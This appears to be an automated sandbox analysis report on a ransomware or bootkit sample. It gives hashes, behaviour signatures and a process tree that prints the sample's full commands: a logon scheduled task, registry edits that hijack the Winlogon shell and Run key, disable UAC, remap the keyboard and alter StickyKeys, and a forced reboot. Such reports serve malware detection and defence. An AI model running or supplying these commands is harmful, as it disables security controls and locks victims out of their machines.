Overview

overview

10

Static

static

10

ฺฺฺK...ฺฺ

windows10_x64

ฺฺฺK...ฺฺ

windows10_x64

ฺฺฺK...ฺฺ

windows10_x64

ฺฺฺK...ฺฺ

windows10_x64

7

ฺฺฺK...ฺฺ

windows10_x64

ฺฺฺK...ฺฺ

windows10_x64

7

ฺฺฺK...ฺฺ

windows10_x64

ฺฺฺK...ฺฺ

windows10_x64

ฺฺฺK...ฺฺ

windows10_x64

10

ฺฺฺK...ฺฺ

windows10_x64

ฺฺฺK...ฺฺ

windows10_x64

6

ฺฺฺK...ฺฺ

windows10_x64

ฺฺฺK...ฺฺ

windows10_x64

1

ฺฺฺK...ฺฺ

windows10_x64

ฺฺฺK...ฺฺ

windows10_x64

ฺฺฺK...ฺฺ

windows10_x64

8

ฺฺฺK...ฺฺ

windows10_x64

ฺฺฺK...ฺฺ

windows10_x64

1

ฺฺฺK...ฺฺ

windows10_x64

ฺฺฺK...ฺฺ

windows10_x64

9

ฺฺฺK...ฺฺ

windows10_x64

ฺฺฺK...ฺฺ

windows10_x64

ฺฺฺK...ฺฺ

windows10_x64

3

ฺฺฺK...ฺฺ

windows10_x64

ฺฺฺK...ฺฺ

windows10_x64

1

ฺฺฺK...ฺฺ

windows10_x64

ฺฺฺK...ฺฺ

windows10_x64

ฺฺฺK...ฺฺ

windows10_x64

ฺฺฺK...ฺฺ

windows10_x64

ฺฺฺK...ฺฺ

windows10_x64

7

ฺฺฺK...ฺฺ

windows10_x64

ฺฺฺK...ฺฺ

windows10_x64

10

Resubmissions

03-07-2024 22:59

240703-2yn7wszhlp 10

03-07-2024 16:13

240703-tn93lsyglf 10

03-07-2024 16:11

240703-tm84xsyfma 10

10-05-2024 16:25

240510-tw1h5shh47 10

24-08-2023 11:16

230824-nda8msdf8z 10

Analysis

  • max time kernel
    38s
  • max time network
    40s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    22-11-2020 06:42

Sharing

Copy URL
Twitter E-mail

Errors

Reason
Machine shutdown
Report Analysis Logs

General

  • Target

    [email protected]

  • Size

    315KB

  • MD5

    9f8bc96c96d43ecb69f883388d228754

  • SHA1

    61ed25a706afa2f6684bb4d64f69c5fb29d20953

  • SHA256

    7d373ccb96d1dbb1856ef31afa87c2112a0c1795a796ab01cb154700288afec5

  • SHA512

    550a891c1059f58aa983138caf65a7ea9c326cb1b94c15f3e7594128f6e9f1295b9c2dbc0925637dba7c94e938083fffc6a63dc7c2e5b1e247679931cce505c6

Score
10/10
bootkitevasionpersistenceransomwaretrojan

Malware Config

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
    persistence
  • UAC bypass 3 TTPs
    evasiontrojan
  • Executes dropped EXE 1 IoCs
  • Modifies WinLogon to allow AutoLogon 2 TTPs 1 IoCs

    Enables rebooting of the machine without requiring login credentials.

    ransomwarebootkit
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Modifies Control Panel 2 IoCs
    evasion
  • Modifies data under HKEY_USERS 15 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 57 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\[email protected]
    "C:\Users\Admin\AppData\Local\Temp\[email protected]"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1628
    • C:\Users\Admin\AppData\Local\system.exe
      "C:\Users\Admin\AppData\Local\system.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:3172
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\del.bat
        3⤵
          PID:492
        • C:\Windows\SysWOW64\SCHTASKS.exe
          C:\Windows\System32\SCHTASKS.exe /create /SC ONLOGON /TN uac /TR "C:\Users\Admin\AppData\Local\bcd.bat" /RL HIGHEST /f
          3⤵
          • Creates scheduled task(s)
          PID:4076
        • C:\windows\SysWOW64\cmd.exe
          C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3940
          • C:\Windows\SysWOW64\reg.exe
            REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
            4⤵
            • Modifies WinLogon for persistence
            PID:2148
        • C:\windows\SysWOW64\cmd.exe
          C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2708
          • C:\Windows\SysWOW64\reg.exe
            REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
            4⤵
            • Adds Run key to start application
            PID:3800
        • C:\windows\SysWOW64\cmd.exe
          C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3684
          • C:\Windows\SysWOW64\reg.exe
            REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
            4⤵
              PID:2300
          • C:\windows\SysWOW64\cmd.exe
            C:\windows\system32\cmd.exe /c REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2836
            • C:\Windows\SysWOW64\reg.exe
              REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
              4⤵
              • Modifies Control Panel
              PID:1944
          • C:\windows\SysWOW64\cmd.exe
            C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2244
            • C:\Windows\SysWOW64\reg.exe
              REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
              4⤵
                PID:576
            • C:\windows\SysWOW64\cmd.exe
              C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1332
              • C:\Windows\SysWOW64\reg.exe
                REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
                4⤵
                  PID:2276
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:64
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:3116
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:64
                  4⤵
                    PID:2560
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c shutdown -r -t 10 -f
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3612
                  • C:\Windows\SysWOW64\shutdown.exe
                    shutdown -r -t 10 -f
                    4⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1960
            • C:\Windows\system32\wlrmdr.exe
              -s -1 -f 2 -t You're about to be signed out -m Windows will shut down in less than a minute. -a 3
              1⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of SetWindowsHookEx
              PID:1972
            • C:\Windows\system32\LogonUI.exe
              "LogonUI.exe" /flags:0x0 /state0:0xa3ad3055 /state1:0x41c64e6d
              1⤵
              • Modifies WinLogon to allow AutoLogon
              • Modifies data under HKEY_USERS
              • Suspicious use of SetWindowsHookEx
              PID:2424

            Network

            MITRE ATT&CK Enterprise v6

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\del.bat
              MD5

              dda69d69d2bf9994650f6c0df260fd80

              SHA1

              94041b483a3b0cda19339bddf09f1bd1b2242fea

              SHA256

              a2126c0c0b9d7401a20582ada62be413320cebb86dff164e5cb91bec7b6aa898

              SHA512

              7e70d053cd60110011844a699eba9a25065cdb2827fd72f379a67f479eb2ddc346223c39e3c2781dc16b8e07915737aba513b5eae57d38e88d46eae318a579ac

              Download Submit

            • C:\Users\Admin\AppData\Local\system.exe
              MD5

              4a42fda5a4ddcd7efb4bc9b2b3a078ad

              SHA1

              bda8e5e2b826a0ca962ffdf68b9873786b842367

              SHA256

              2b6beee78d86145985d69f9a9ec862b96b777901489e5eac564565a7cc0be42c

              SHA512

              044f277f273cd0b9e07ff661c976e30744bfb10a10a528a8837d848583a7903093bcccbf8c5233695e4db0e2e488732f08a72cb452fdb0cfa90476515da80e30

              Download Submit

            • C:\Users\Admin\AppData\Local\system.exe
              MD5

              4a42fda5a4ddcd7efb4bc9b2b3a078ad

              SHA1

              bda8e5e2b826a0ca962ffdf68b9873786b842367

              SHA256

              2b6beee78d86145985d69f9a9ec862b96b777901489e5eac564565a7cc0be42c

              SHA512

              044f277f273cd0b9e07ff661c976e30744bfb10a10a528a8837d848583a7903093bcccbf8c5233695e4db0e2e488732f08a72cb452fdb0cfa90476515da80e30

              Download Submit

            • memory/492-3-0x0000000000000000-mapping.dmp

              Download

            • memory/576-14-0x0000000000000000-mapping.dmp

              Download

            • memory/1332-11-0x0000000000000000-mapping.dmp

              Download

            • memory/1944-13-0x0000000000000000-mapping.dmp

              Download

            • memory/1960-21-0x0000000000000000-mapping.dmp

              Download

            • memory/2148-12-0x0000000000000000-mapping.dmp

              Download

            • memory/2244-10-0x0000000000000000-mapping.dmp

              Download

            • memory/2276-16-0x0000000000000000-mapping.dmp

              Download

            • memory/2300-15-0x0000000000000000-mapping.dmp

              Download

            • memory/2560-19-0x0000000000000000-mapping.dmp

              Download

            • memory/2708-7-0x0000000000000000-mapping.dmp

              Download

            • memory/2836-9-0x0000000000000000-mapping.dmp

              Download

            • memory/3116-18-0x0000000000000000-mapping.dmp

              Download

            • memory/3172-0-0x0000000000000000-mapping.dmp

              Download

            • memory/3612-20-0x0000000000000000-mapping.dmp

              Download

            • memory/3684-8-0x0000000000000000-mapping.dmp

              Download

            • memory/3800-17-0x0000000000000000-mapping.dmp

              Download

            • memory/3940-6-0x0000000000000000-mapping.dmp

              Download

            • memory/4076-4-0x0000000000000000-mapping.dmp

              Download